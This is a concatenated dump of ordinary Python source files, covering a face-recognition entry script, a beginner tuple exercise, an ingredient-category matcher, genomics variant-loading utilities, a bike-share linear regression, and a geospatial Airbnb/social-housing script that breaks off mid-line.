{:.2f}\".format(fps.fps()))\n\n\t# do a bit of cleanup\n\tcv2.destroyAllWindows()\n\tvs.stop()\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--encodings', type=str, default='./encodings.pickle',\n\t\t\t\t\t\thelp='path to encodings of images')\n\tparser.add_argument('--haar-encodings', type=str, default='./haarcascade_frontalface_default.xml',\n\t\t\t\t\t\thelp='path to pre-trained haar encodings')\n\tparser.add_argument('--sentences-ok', type=str, default='./sentences_ok.txt', \n\t\t\t\t\t\thelp='Text file containing sentences when passage is okay')\n\tparser.add_argument('--sentences-stop', type=str, default='./sentences_stop.txt', \n\t\t\t\t\t\thelp='Text file containing sentences when passage is denied')\n\tparser.add_argument('--name-exception', type=str, default='', \n\t\t\t\t\t\thelp='names of person for which passage is okay')\n\tparser.add_argument('--voice', type=str, default='google', choices=['google', 'espeak'],\n\t\t\t\t\t\thelp='choose between \"google\" (requires internet access) and \"espeak\"')\n\targs = parser.parse_args()\n\tmain(args)\n","sub_path":"facial_req.py","file_name":"facial_req.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220097968","text":"num = (int(input('Valor 1: ')),\n int(input('Valor 2: ')),\n int(input('Valor 3: ')),\n int(input('Valor 4: ')))\nprint('- ' * 15)\nif 9 in num:\n print(f'O número 9 aparece {num.count(9)} vez(es)')\nelse:\n print('O número 9 não foi digitado')\nif 3 in num:\n print(f'O número 3 foi digitado na {num.index(3) + 1}ª posição pela primeira vez')\nelse:\n print('O número 3 não foi digitado')\npar = False\ncont = 0\nfor n in num:\n if n % 2 == 0:\n cont += 1\nif cont > 0:\n par = True\nif par:\n print('Os número pares digitados foram: ', end='')\n for n in num:\n if n % 2 == 0:\n print(n, end=' ')\n print()\nelse:\n print('Não foi digitado nenhum número par')\n\nprint('- ' * 15)\n","sub_path":"Revisao_Estruturas_Dados/rev_075.py","file_name":"rev_075.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"619016123","text":"# Import some packages\n\nimport _pickle as cPickle\nimport string\nimport pandas as pd\nimport numpy as np\nimport scipy\nfrom scipy import spatial\n\nfrom bs4 import BeautifulSoup\nimport urllib.parse\nimport urllib.request\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n\nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\n\nfrom googleapiclient.discovery import build\nimport os.path\n\nimport wikipedia\n\n# Load some data, define some values\n\nvectorizer = cPickle.load(open('../greenr/vectorizer.pk', 'rb'))\ndf_wiki_similarities = cPickle.load(open('../greenr/df_wiki_similarities.pk', 'rb'))\ndf_recorded_similarities = cPickle.load(open('../greenr/df_recorded_similarities.pk', 'rb'))\n\napi_key = cPickle.load(open('../greenr/api_key.pk', 'rb'))\ncse_id = \"dd94ab4664d1ce589\"\n\ncatsums = df_wiki_similarities['summaries'][:45]\ncats = list(df_wiki_similarities[df_wiki_similarities['ingr/cat'] == 'cat']\n ['ingredient'])\ncatvectors = vectorizer.transform(catsums)\n\nsimilarity_cutoff = 0.1\nno_match = 'No match found'\n\n# Define some utility functions\n\ndef is_ingredient_in_database(ingredient):\n found = ingredient in list(df_recorded_similarities.ingredient)\n return found\n\ndef get_database_match(ingredient):\n\n match = df_recorded_similarities.loc[df_recorded_similarities['ingredient'] == ingredient, 'category'].iloc[0]\n\n return match\n\ndef is_ingredient_in_wikidata(ingredient):\n found = ingredient in list(df_wiki_similarities.ingredient)\n return found\n\ndef get_wiki_match(ingredient):\n\n i_ix = list(df_wiki_similarities.ingredient).index(ingredient)\n\n chosen_summ = df_wiki_similarities.summaries[i_ix]\n\n sims = df_wiki_similarities.iloc[i_ix, 4:]\n\n c_ix = pd.to_numeric(sims).argmax()\n\n ingredient = df_wiki_similarities['ingredient'][i_ix]\n category = df_wiki_similarities['ingredient'][c_ix]\n\n return category, max(sims)\n\ndef google_query(query, api_key, cse_id, **kwargs):\n\n query_service = build(\"customsearch\", \"v1\", developerKey=api_key, cache_discovery = False)\n query_results = query_service.cse().list(q=query, cx=cse_id,\n **kwargs).execute()\n\n return query_results['items']\n\n\ndef get_google_cse_result(ingredient):\n\n query = f'{ingredient} food'\n\n my_results = google_query(query, api_key, cse_id, num=1)[0]\n\n url = my_results['link']\n url_base = os.path.basename(my_results['link'])\n\n return ingredient, url, url_base\n\ndef get_pageid_from_base(base):\n\n info_url = f'https://en.wikipedia.org/w/index.php?title={base}&action=info'\n\n req = urllib.request.Request(info_url)\n req.add_header('Cookie', 'euConsent=true')\n html_content = urllib.request.urlopen(req).read()\n soup = BeautifulSoup(html_content, 'html.parser')\n\n infosection = soup.find(\"script\")\n pageid = infosection.decode().partition('wgArticleId\":')[2].partition(\n ',')[0]\n\n return pageid\n\ndef get_summary_from_id(pageid):\n\n pagesummary = wikipedia.page(pageid=pageid).summary\n\n return pagesummary\n\ndef pre_process_summary(summary):\n\n # Remove punctuation\n for punctuation in string.punctuation:\n summary = str(summary).replace(punctuation, '')\n\n # Lower text\n summary = summary.lower()\n\n # Stopwords\n stop_words = set(stopwords.words('english'))\n summary_tokenized = word_tokenize(summary)\n text = [w for w in summary_tokenized if not w in stop_words]\n summary = ' '.join(text)\n\n # Remove digits\n summary = ''.join([word for word in summary if not word.isdigit()])\n\n # Lemmatize\n lemmatizer = WordNetLemmatizer()\n\n summary = ' '.join([lemmatizer.lemmatize(word) for word in summary.split(' ')])\n\n # Keep only nouns\n tokens = summary.split()\n tags = nltk.pos_tag(tokens)\n\n summary = [\n word for word, pos in tags\n if (pos == 'NN' or pos == 'NNP' or pos == 'NNS' or pos == 'NNPS')\n ]\n\n summary = ' '.join(summary)\n\n return summary\n\ndef get_match_and_score(summary_vector):\n\n scoreseries = []\n\n for j, catsum in enumerate(catsums):\n\n cosine_sum = 1 - spatial.distance.cosine(summary_vector.toarray(),\n catvectors[j, :].toarray())\n\n scoreseries.append(cosine_sum)\n\n matchscore = max(scoreseries)\n match = cats[scoreseries.index(matchscore)]\n\n return match, matchscore\n\ndef get_google_match(ingredient):\n\n try:\n ingredient, url, url_base = get_google_cse_result(ingredient)\n except:\n return 'nomatch', 0\n\n pageid = get_pageid_from_base(url_base)\n\n pagesummary = get_summary_from_id(pageid)\n\n processed_summary = pre_process_summary(pagesummary)\n\n summary_vector = vectorizer.transform([processed_summary])\n\n match, matchscore = get_match_and_score(summary_vector)\n\n return match, matchscore\n\ndef update_database(ingredient, match):\n\n global df_recorded_similarities\n\n df_tmp = pd.DataFrame([[ingredient, match]], columns = ['ingredient','category'])\n\n df_recorded_similarities = df_recorded_similarities.append(df_tmp, ignore_index=True)\n\n cPickle.dump(df_recorded_similarities, open(\"../greenr/df_recorded_similarities.pk\", \"wb\"))\n\n return None\n\n# Define the matching function\n\ndef get_categories(df_parser_output, try_google=False):\n\n matched_categories = []\n\n list_of_ingredients = list(df_parser_output['name'])\n\n for ingredient in list_of_ingredients:\n\n if is_ingredient_in_database(ingredient):\n\n match = get_database_match(ingredient)\n\n else:\n\n if is_ingredient_in_wikidata(ingredient):\n\n wikimatch, score = get_wiki_match(ingredient)\n\n if score > similarity_cutoff:\n match = wikimatch\n\n elif try_google:\n googlematch, score = get_google_match(ingredient)\n if score > similarity_cutoff:\n match = googlematch\n else:\n match = no_match\n\n else:\n match = no_match\n\n elif try_google:\n\n googlematch, score = get_google_match(ingredient)\n\n if score > similarity_cutoff:\n match = googlematch\n\n else:\n match = no_match\n\n else:\n match = no_match\n\n update_database(ingredient, match)\n\n matched_categories.append(match)\n\n for i,cat in enumerate(matched_categories):\n if cat == 'Onions & leeks':\n matched_categories[i] = 'Onions & Leeks'\n\n if cat == 'Berries & Grapes2':\n matched_categories[i] = 'Berries & Grapes'\n\n return matched_categories\n","sub_path":"greenr/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69729522","text":"import numpy as np\nimport pandas as pd\nimport allel\n\n\ndef read_fragments(fragments_path):\n\t''' \n\tReads fragments file and returns read allele and quality data as \n\t\tnumpy matrices. Sites in matrices where there is no data are np.nan\n\n\tArgs:\tpath to a fragments.txt file\n\n\tReturns 3 numpy arrays:\n\t\tarray of fragment_ids corresponding to rows\n\t\tmatrix of allele values {0,1,np.nan} where rows correspond to samples \n\t\t\tand cols to sites\n\t\tmatrix of Phred quality scores or np.nan where no read\n\t'''\n\tfrag_ids, row_col_pairs, allele_vals, qual_scores = read_fragments_arrays(\n\t\tfragments_path\n\t)\n\n\tallele_mat = np.full(row_col_pairs.max(axis=0)+1, np.nan)\n\tallele_mat[row_col_pairs[:,0], row_col_pairs[:,1]] = allele_vals\n\n\tqual_mat = np.full(row_col_pairs.max(axis=0)+1, np.nan)\n\tqual_mat[row_col_pairs[:,0], row_col_pairs[:,1]] = qual_scores\n\n\treturn frag_ids, allele_mat, qual_mat\n\n\ndef read_fragments_arrays(fragments_path):\n\t''' \n\tReads fragments file and returns data as numpy arrays of corresponding\n\t\tindices and data\n\n\tArgs:\tpath to a fragments.txt file\n\n\tReturns 4 numpy arrays:\n\t\tfragment_ids corresponding to rows\n\t\trow col indices for the data in allele_vals and qual_scores\n\t\tallele values {0,1} at row,col locs\n\t\tPhred quality scores at row,col locs\n\t'''\n\twith open(fragments_path) as f:\n\n\t\tfrag_ids = []\t\t# fragment ids from col 2\n\t\trow_col_pairs = []\t# row,col indices coresponding to allele values\n\t\tallele_vals = []\t# \tand quality scores as matrices\n\t\tqual_scores = []\n\n\t\trow_ind = 0\n\n\t\tfor line in f:\n\t\t\tline_data = line.strip().split()\n\t\t\tfrag_ids.append(line_data[1])\n\n\t\t\t# get sample's row,col pairs and allele vals\n\t\t\tblock_data = line_data[2:-1]\n\n\t\t\tfor i in range(0, len(block_data), 2):\n\t\t\t\tblock_start_ind = int(block_data[i])\n\n\t\t\t\tfor start_offset in range(len(block_data[i + 1])):\n\t\t\t\t\trow_col_pairs.append(\n\t\t\t\t\t\t(row_ind, block_start_ind + start_offset)\n\t\t\t\t\t)\n\t\t\t\t\tallele_vals.append(block_data[i + 1][start_offset])\n\n\t\t\t# add quality scores\n\t\t\tqual_str = line_data[-1]\n\t\t\tfor char in qual_str:\n\t\t\t\tqual_scores.append(ord(char) - 33)\n\n\t\t\trow_ind += 1\n\n\t\t# set indices to start at 0\n\t\trow_col_pairs = np.array(row_col_pairs)\n\t\trow_col_pairs -= row_col_pairs.min(axis=0, keepdims=True)\n\n\t\treturn (\n\t\t\tnp.array(frag_ids),\n\t\t\trow_col_pairs,\n\t\t\tnp.array(allele_vals).astype(int),\n\t\t\tnp.array(qual_scores)\n\t\t)\n\n\ndef get_bed_mask(bed_path, ls_callset_pos, chrom='chr20'):\n\t''' \n\tReads areas in GIAB from .bed and uses to mask longshot callset positions\n\t'''\n\twith open(bed_path) as f:\n\t\tstarts = []\n\t\tends = []\n\n\t\tfor line in f:\n\t\t\tline_data = line.strip().split()\n\n\t\t\tif line_data[0] == chrom:\n\t\t\t\tstarts.append(line_data[1])\n\t\t\t\tends.append(line_data[2])\n\n\tstarts = np.array(starts).astype(int)\n\tends = np.array(ends).astype(int)\n\n\tin_bed_range = []\n\n\tfor ls_pos in ls_callset_pos:\n\t\tin_bed_range.append(\n\t\t\tnp.any((starts <= ls_pos) & (ends > ls_pos))\n\t\t)\n\n\treturn np.array(in_bed_range)\n\n\ndef get_true_variants(longshot_vcf_path, ground_truth_vcf_path, giab_bed_path,\n\t\t\t\t\t\treturn_vcfs=False):\n\t''' \n\tFinds true/false variants in fragments file using GIAB ground truth vcf\n\n\tArgs: \n\t\tlongshot_vcf_path: path to \"2.0.realigned_genotypes.vcf\" for longshot run\n\t\t\tthat produced the fragments.txt file being used\n\t\tground_truth_vcf_path: path to GIAB ground truth vcf\n\t\tgiab_bed_path: giab ground truth corresponding .bed\n\t\treturn_vcfs: if the longshot and ground_truth vcfs should be returned.\n\t\t\tWill be returned as callsets\n\t\n\tReturns:\n\t\tarray length of number of cols of fragments matrix where each is\n\t\t\tlabeled True/False wrt being real variants\n\t\tsite_mask to use to filter columns of fragments matrix\n\t\tif return_vcfs, returns (true_variants, longshot_vcf, ground_truth_vcf)\n\t'''\n\t# load vcf from longshot run\n\tls_callset = allel.read_vcf(longshot_vcf_path)\n\n\t# load ground truth vcf\n\tcallset = allel.read_vcf(ground_truth_vcf_path)\n\n\t# find true variants\n\tchr20_mask = callset['variants/CHROM'] == ls_callset['variants/CHROM'][0]\n\tcallset = mask_callset(callset, chr20_mask)\n\n\tin_truth = np.in1d(ls_callset['variants/POS'], callset['variants/POS'])\n\n\t# mask out regions not in .bed\n\tin_bed_mask = get_bed_mask(giab_bed_path, ls_callset['variants/POS'])\n\n\t# find where longshot predicts heterozygous\n\tls_01 = np.all(np.equal(ls_callset['calldata/GT'], [0,1]), axis=2).T[0]\n\tls_10 = np.all(np.equal(ls_callset['calldata/GT'], [1,0]), axis=2).T[0]\n\tls_hetero = ls_01 | ls_10\n\n\tsite_mask = in_bed_mask & ls_hetero\n\n\tif return_vcfs:\n\t\treturn in_truth.astype(int)[site_mask], site_mask, ls_callset, callset\n\telse:\n\t\treturn in_truth.astype(int)[site_mask], site_mask\n\n\ndef mask_callset(callset, mask):\n\tfor key in list(callset):\n\t\tif key == 'samples':\n\t\t\tcontinue\n\t\tcallset[key] = callset[key][mask]\n\n\treturn callset\n\n\ndef matrix_sparsity_info(allele_mat, print_info=False):\n\t''' \n\tGet info about sparsity of allele/quality/incorrect read matrix by\n\trows and cols\n\t'''\n\n\tsample_reads = np.count_nonzero(~np.isnan(allele_mat), axis=1)\n\tsite_reads = np.count_nonzero(~np.isnan(allele_mat), axis=0)\n\n\tif print_info:\n\t\tnonzero_sites = np.count_nonzero(~np.isnan(allele_mat))\n\n\t\tprint(\"num elements not missing:\\t{}\".format(nonzero_sites))\n\t\tprint(\"percent matrix not missing:\\t{:.3f}\".format(\n\t\t\tnonzero_sites / allele_mat.size\n\t\t))\n\n\t\tprint(\"num fragments:\\t{}\".format(allele_mat.shape[0]))\n\t\tprint(\"num sites:\\t{}\".format(allele_mat.shape[1]))\n\n\t\tprint(\"\\nfragments:\")\n\t\tval = np.mean(sample_reads)\n\t\tprint(\"\\tmean reads:\\t{:.1f}\\t{:.3f}\".format(val, val / allele_mat.shape[1]))\n\t\tval = np.median(sample_reads)\n\t\tprint(\"\\tmedian reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[1]))\n\t\tval = np.max(sample_reads)\n\t\tprint(\"\\tmax reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[1]))\n\t\tval = np.min(sample_reads)\n\t\tprint(\"\\tmin reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[1]))\n\t\t\n\t\tprint(\"\\nsites:\")\n\t\tval = np.mean(site_reads)\n\t\tprint(\"\\tmean reads:\\t{:.1f}\\t{:.3f}\".format(val, val / allele_mat.shape[0]))\n\t\tval = np.median(site_reads)\n\t\tprint(\"\\tmedian reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[0]))\n\t\tval = np.max(site_reads)\n\t\tprint(\"\\tmax reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[0]))\n\t\tval = np.min(site_reads)\n\t\tprint(\"\\tmin reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[0]))\n\n\treturn sample_reads, site_reads\n\n\ndef save_preprocessed(path, fragments, qualities, variant_labels):\n\tnp.savez(\n\t\tpath, \n\t\tfragments=fragments,\n\t\tqualities=qualities,\n\t\tvariant_labels=variant_labels)\n\n\ndef load_preprocessed(path):\n\t''' Returns (fragments, qualities, variant_labels) from .npz '''\n\tdata = np.load(path)\n\treturn data['fragments'], data['qualities'], data['variant_labels']\n\n\ndef encode_genotype(gt):\n\t'''\n\tEncode genotype from giab vcf as int:\n\t\t0 if 0/0\n\t\t1 if 0/1\n\t\t2 if 1/1\n\t\t-1 if anything else\n\t'''\n\tif gt[0] == 0 and gt[1] == 0:\n\t\treturn 0\n\telif gt[0] == 1 and gt[1] == 1:\n\t\treturn 2\n\telif (gt[0] == 0 and gt[1] == 1) or (gt[0] == 1 and gt[1] == 0):\n\t\treturn 1\n\telse:\n\t\treturn -1\n\n\ndef load_data(fragments_path, longshot_vcf_path, ground_truth_vcf_path,\n\t\t\t\tgiab_bed_path, save_path=None, return_full_frag_mats=False):\n\t''' \n\tLoad data from fragments.txt & 2.0.realigned_genotypes.vcf files\n\tgenerated by Longshot and the GIAB ground truth vcf and bed files\n\n\tArgs:\n\t\tfragments_path: path to fragments.txt\n\t\tlongshot_vcf_path: path to 2.0.realigned_genotypes.vcf\n\t\tground_truth_vcf_path: path to something like \n\t\t\tHG002_GRCh38_1_22_v4.1_draft_benchmark.vcf\n\t\tgiab_bed_path: path to something like HG002_..._benchmark.bed\n\t\tsave_path: location to save a file in a directory that already \n\t\t\texists\n\t\treturn_full_frag_mats: if True, returns unmasked fragments and\n\t\t\tqualities matrices in addition to masked versions usually \n\t\t\treturned\n\n\tReturns:\n\t\t(site_data, fragments, qualities) or if return_full_frag_mats:\n\t\t(site_data, fragments, qualities, fragments_unmasked, \n\t\t\tqualities_unmasked)\n\n\t\tsite_data: DataFrame with info for all sites HMM predicts are\n\t\t\theterozygous\n\t\tfragments: fragments matrix as returned by read_fragments masked\n\t\t\tto sites HMM predicts are heterozygous\n\t\tqualities: qualities matrix as returned by read_fragments masked\n\t\t\tto sites HMM predicts are heterozygous\n\t\tfragments_unmasked: fragments matrix as returned by read_fragments\n\t\tqualities_unmasked: qualities matrix as returned by read_fragments\t\t\n\t'''\n\t# load vcf from longshot run\n\tls_callset = allel.read_vcf(longshot_vcf_path)\n\n\t# find where longshot hmm predicts heterozygous\n\tls_01 = np.all(np.equal(ls_callset['calldata/GT'], [0,1]), axis=2).T[0]\n\tls_10 = np.all(np.equal(ls_callset['calldata/GT'], [1,0]), axis=2).T[0]\n\tls_hetero = ls_01 | ls_10\n\thetero_site_inds = np.where(ls_hetero)[0]\n\n\tls_callset = mask_callset(ls_callset, ls_hetero)\n\n\t# binary if site in .bed region (and therefore there will be ground truth)\n\tin_bed_mask = get_bed_mask(giab_bed_path, ls_callset['variants/POS']).astype(int)\n\n\t# load ground truth vcf\n\tgiab_callset = allel.read_vcf(ground_truth_vcf_path)\n\n\t# mask GIAB vcf to correct chromesome and make DataFrame rep\n\tchr_mask = giab_callset['variants/CHROM'] == ls_callset['variants/CHROM'][0]\n\tgiab_callset = mask_callset(giab_callset, chr_mask)\n\n\tgiab_df = pd.DataFrame(\n\t\tnp.vstack((\n\t\t\tgiab_callset['variants/CHROM'],\n\t\t\tgiab_callset['variants/POS'],\n\t\t\tgiab_callset['variants/REF'],\n\t\t\t[','.join(giab_callset['variants/ALT'][i]) for i in range(\n\t\t\t\t\tgiab_callset['variants/ALT'].shape[0])],\n\t\t\t[encode_genotype(gt[0]) for gt in giab_callset['calldata/GT']] \n\t\t)).T,\n\t\tcolumns=['chrom', 'pos', 'ref', 'alt', 'genotype']\n\t)\n\n\tdf = pd.DataFrame(\n\t\tnp.array((\n\t\t\thetero_site_inds, \n\t\t\tin_bed_mask, \n\t\t\tls_callset['variants/CHROM'],\n\t\t\tls_callset['variants/POS'])).T,\n\t\tcolumns=['site_ind', 'in_bed', 'chrom', 'pos']\n\t)\n\n\tdf = pd.merge(df, giab_df, how='left', on=['chrom', 'pos'])\n\n\t# fill for genotype=0 sites in bed but not var sites\n\tdf.loc[df.in_bed == 1, 'genotype'] = df.loc[df.in_bed == 1]['genotype'].fillna(0)\n\n\t# save\n\tif save_path:\n\t\tdf.to_csv(save_path, na_rep='', sep='\\t', index=False)\n\n\t# load read fragments and their qualities\n\t_, fragments, qualities = read_fragments(fragments_path)\n\n\tif return_full_frag_mats:\n\t\treturn (df, fragments[:, df.site_ind.astype(int)], \n\t\t\t\tqualities[:, df.site_ind.astype(int)], fragments, qualities)\n\telse:\n\t\treturn (df, fragments[:, df.site_ind.astype(int)], \n\t\t\t\tqualities[:, df.site_ind.astype(int)])\n\n\ndef load_full_data(fragments_path, longshot_vcf_path, ground_truth_vcf_path,\n\t\t\t\t\tgiab_bed_path, save_path=None):\n\t''' \n\tLoad data from fragments.txt & 2.0.realigned_genotypes.vcf files\n\tgenerated by Longshot and the GIAB ground truth vcf and bed files.\n\tDoes not mask data to Longshot predicted heterozygous sites as \n\tload_data does.\n\n\tArgs:\n\t\tfragments_path: path to fragments.txt\n\t\tlongshot_vcf_path: path to 2.0.realigned_genotypes.vcf\n\t\tground_truth_vcf_path: path to something like \n\t\t\tHG002_GRCh38_1_22_v4.1_draft_benchmark.vcf\n\t\tgiab_bed_path: path to something like HG002_..._benchmark.bed\n\t\tsave_path: location to save a file in a directory that already \n\t\t\texists\n\n\tReturns:\n\t\tsite_data, fragments, qualities\n\n\t\tsite_data: DataFrame with info for all sites in fragments matrix\n\t\tfragments: fragments matrix as returned by read_fragments\n\t\tqualities: qualities matrix as returned by read_fragments\t\n\t'''\n\t# load vcf from longshot run\n\tls_callset = allel.read_vcf(longshot_vcf_path)\n\n\t# longshot hmm predictions\n\tls_01 = np.all(np.equal(ls_callset['calldata/GT'], [0,1]), axis=2).T[0]\n\tls_10 = np.all(np.equal(ls_callset['calldata/GT'], [1,0]), axis=2).T[0]\n\tls_hetero = ls_01 | ls_10\n\tls_11 = np.all(np.equal(ls_callset['calldata/GT'], [1,1]), axis=2).T[0]\n\n\tls_gt = np.zeros(ls_callset['variants/POS'].shape[0]).astype(int)\n\tls_gt[ls_hetero] = 1\n\tls_gt[ls_11] = 2\n\n\t# binary if site in .bed region (and therefore there will be ground truth)\n\tin_bed_mask = get_bed_mask(giab_bed_path, ls_callset['variants/POS']).astype(int)\n\n\t# load ground truth vcf\n\tgiab_callset = allel.read_vcf(ground_truth_vcf_path)\n\n\t# mask GIAB vcf to correct chromesome and make DataFrame rep\n\tchr_mask = giab_callset['variants/CHROM'] == ls_callset['variants/CHROM'][0]\n\tgiab_callset = mask_callset(giab_callset, chr_mask)\n\n\tgiab_df = pd.DataFrame(\n\t\tnp.vstack((\n\t\t\tgiab_callset['variants/CHROM'],\n\t\t\tgiab_callset['variants/POS'],\n\t\t\tgiab_callset['variants/REF'],\n\t\t\t[','.join(giab_callset['variants/ALT'][i]) for i in range(\n\t\t\t\t\tgiab_callset['variants/ALT'].shape[0])],\n\t\t\t[encode_genotype(gt[0]) for gt in giab_callset['calldata/GT']]\n\t\t)).T,\n\t\tcolumns=['chrom', 'pos', 'ref', 'alt', 'genotype']\n\t)\n\n\tdf = pd.DataFrame(\n\t\tnp.array((\n\t\t\trange(ls_callset['variants/POS'].shape[0]), \n\t\t\tin_bed_mask, \n\t\t\tls_callset['variants/CHROM'],\n\t\t\tls_callset['variants/POS'],\n\t\t\tls_gt\n\t\t)).T,\n\t\tcolumns=[\n\t\t\t'site_ind', 'in_bed', 'chrom', 'pos',\n\t\t\t'ls_hmm_pred_genotype'\n\t\t]\n\t)\n\n\tdf = pd.merge(df, giab_df, how='left', on=['chrom', 'pos'])\n\n\t# fill for genotype=0 sites in bed but not var sites\n\tdf.loc[df.in_bed == 1, 'genotype'] = df.loc[df.in_bed == 1]['genotype'].fillna(0)\n\n\t# save\n\tif save_path:\n\t\tdf.to_csv(save_path, na_rep='', sep='\\t', index=False)\n\n\t# load read fragments and their qualities\n\t_, fragments, qualities = read_fragments(fragments_path)\n\n\treturn df, fragments, qualities\n\t\n\ndef load_longshot_data(fragments_path, longshot_vcf_path, \n\t\t\t\t\t\treturn_vcf=False):\n\t''' \n\tLoad data from fragments.txt & 2.0.realigned_genotypes.vcf files\n\tgenerated by Longshot.\n\n\tArgs:\n\t\tfragments_path: path to fragments.txt\n\t\tlongshot_vcf_path: path to 2.0.realigned_genotypes.vcf\n\t\treturn_vcf: also returns longshot_vcf_path data dict as read\n\t\t\tby scikit-allel when True\n\n\tReturns:\n\t\tsite_data, fragments, qualities, vcf_dict(opt)\n\n\t\tsite_data: DataFrame with info for all sites HMM predicts are\n\t\t\theterozygous\n\t\tfragments: fragments matrix as returned by read_fragments, possibly\n\t\t\tmasked\n\t\tqualities: qualities matrix as returned by read_fragments, possibly\n\t\t\tmasked\n\t\tvcf_dict: longshot_vcf_path data dict as read by scikit-allel\n\t'''\n\t# load vcf from longshot run\n\tls_callset = allel.read_vcf(longshot_vcf_path)\n\n\t# find where longshot hmm predicts heterozygous\n\tls_01 = np.all(np.equal(ls_callset['calldata/GT'], [0,1]), axis=2).T[0]\n\tls_10 = np.all(np.equal(ls_callset['calldata/GT'], [1,0]), axis=2).T[0]\n\tls_hetero = ls_01 | ls_10\n\n\tdf = pd.DataFrame(\n\t\tnp.array((\n\t\t\trange(ls_callset['variants/POS'].shape[0]),\n\t\t\tls_callset['variants/CHROM'],\n\t\t\tls_callset['variants/POS'],\n\t\t\tls_hetero.astype(int)\n\t\t)).T,\n\t\tcolumns=['site_ind', 'chrom', 'pos', 'hmm_pred_hetero']\n\t)\n\n\t# load read fragments and their qualities\n\t_, fragments, qualities = read_fragments(fragments_path)\n\n\tif return_vcf:\n\t\treturn df, fragments, qualities, ls_callset\n\telse:\n\t\treturn df, fragments, qualities\n\n\nif __name__ == '__main__':\n\tfragments_path='data/fragments/chr20_1-1M/fragments.txt'\n\tlongshot_vcf_path='data/fragments/chr20_1-1M/2.0.realigned_genotypes.vcf'\n\tground_truth_vcf_path='data/GIAB/HG002_GRCh38_1_22_v4.1_draft_benchmark.vcf'\n\tgiab_bed_path='data/GIAB/HG002_GRCh38_1_22_v4.1_draft_benchmark.bed'\n\tsite_data_save_path='data/preprocessed/1M_site_data.tsv'\n\n\t# df, fragments, qualities, ff, _ = load_data(\n\t# \tfragments_path, \n\t# \tlongshot_vcf_path, \n\t# \tground_truth_vcf_path,\n\t# \tgiab_bed_path, \n\t# \tsave_path=site_data_save_path)\n\n\t# df, fragments, qualities = load_longshot_data(fragments_path, longshot_vcf_path)\n\n\tdf, fragments, qualities = load_full_data(fragments_path, longshot_vcf_path, ground_truth_vcf_path,\n\t\t\t\tgiab_bed_path)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"515299791","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 08 13:56:44 2015\n\n@author: Steve Elston\n\nCode to create a simple linear model for testing purposes.\n\"\"\"\n\ndef azureml_main(BikeShare):\n from sklearn import linear_model\n import pandas as pd\n \n cols = ['temp', 'hum', 'xformWorkHr', 'dayCount', 'mnth']\n X = BikeShare[cols].as_matrix()\n Y = BikeShare['cnt'].as_matrix()\n ## Compute the linear model.\n clf = linear_model.LinearRegression()\n bike_lm = clf.fit(X, Y)\n \n coef_names = ['intercept'] + cols\n \n ## Build a DataFrame to output the coeficients \n lm_co = []\n lm_co.append(bike_lm.intercept_)\n for val in list(bike_lm.coef_): lm_co.append(val)\n \n coefs = pd.DataFrame({'coef_names' : coef_names,\n 'coefs' : lm_co}\n )\n \n return coefs\n","sub_path":"Python/linearmodel.py","file_name":"linearmodel.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291759504","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 6 13:44:10 2019\n\n@author: romain\n\"\"\"\n\nimport pandas as pd\nimport geopandas as gpd\n\nif __name__ == '__main__':\n\n# df = pd.read_csv('paris_rpls_2017.csv', sep=',', header='infer',\n# usecols=['longitude','latitude'])\n#\n# gdf = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df.longitude, df.latitude))\n# gdf.drop(columns=['longitude','latitude'], inplace=True)\n# gdf.to_file(\"static/donneesgeos/rpls.geojson\", driver='GeoJSON')\n\n# df = pd.read_csv(\"airbnb.csv\", sep=',', header='infer',\n# usecols=['latitude','longitude'],\n# dtype={'longitude':'float', 'latitude':'float'})\n# gdf = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df.longitude, df.latitude))\n# gdf.drop(columns=['longitude','latitude'], inplace=True)\n# gdf.to_file(\"static/donneesgeos/airbnb.geojson\", driver='GeoJSON')\n \n# results = pd.read_csv('results.csv', header='infer', index_col='id_bnb',\n# dtype={'id_rpls':'int', 'distance':'float'})\n \n# results = results.loc[results.distance < 5]\n# gdf = gpd.GeoDataFrame(results)\n\n#-----------------------------------------------------------------------------#\n# Création croisement.geojson avec pour airbnb avec au moins un score > seuil #\n#-----------------------------------------------------------------------------#\n keep_columns = ['id_bnb']\n for i in range(250):\n keep_columns.append('id_rpls{}'.format(i))\n keep_columns.append('score{}'.format(i))\n dtype = {key:'int64' for key in keep_columns}\n \n df_results = pd.read_csv('results_rd155_nb250.csv', header='infer'\n , usecols=keep_columns,\n index_col='id_bnb'\n )\n \n df_results.index.rename('id_bnb', inplace=True)\n\n df_bnb = pd.read_csv(\"airbnb.csv\", sep=',', header='infer',\n usecols=['latitude','longitude'],\n dtype={'longitude':'float', 'latitude':'float'})\n\n # On crée des colonnes de booléens pour la condition score > seuil\n seuil = 0.8\n condition_colonne = df_results['score0'] > seuil\n df_results.loc[:,'seuil0'] = condition_colonne\n for i in range(1,250):\n colonne_inter = 